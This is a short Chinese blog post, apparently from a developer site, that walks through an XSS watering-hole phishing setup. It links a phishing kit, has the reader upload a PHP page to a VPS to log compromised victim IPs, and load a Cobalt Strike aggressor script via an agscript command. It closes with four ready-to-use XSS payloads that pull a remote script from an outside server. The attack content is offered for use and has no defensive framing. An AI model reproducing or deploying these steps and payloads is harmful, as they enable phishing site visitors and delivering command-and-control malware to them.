XSS水坑钓鱼
一、github的项目下载地址#
https://github.com/timwhitez/Doge-XSS-Phishing
二、vps的web目录#
在根目录上传bobo.php页面
在php根目录新建botIPs.txt(名字可在bobo.php中进行修改)文件用于存储已上线ip
三、修改test.js的内容#
四、修改sendip.cna的内容#
并在cobaltstrike中加载该插件
nohup ./agscript [ip] [port] [username] [password] sendip.cna &
五、将test.js插入xss处即可#
这里放入结果远程加载js的标签,具体xss bypass在xss章节讨论
<svg onload="$.getScript`http://10.0.0.225/test2.js`" stype="display:none">
<script src=http://10.0.0.225/test2.js></script>
<img src=x onerror=$.getScript('http://10.0.0.225/test2.js')>
<details ontoggle="$.getScript`http://10.0.0.225/test2.js`">123</details>
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· go语言实现终端里的倒计时
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· 周边上新:园子的第一款马克杯温暖上架
· 分享 3 个 .NET 开源的文件压缩处理库,助力快速实现文件压缩解压功能!
· Ollama——大语言模型本地部署的极速利器
· DeepSeek如何颠覆传统软件测试?测试工程师会被淘汰吗?
· 使用C#创建一个MCP客户端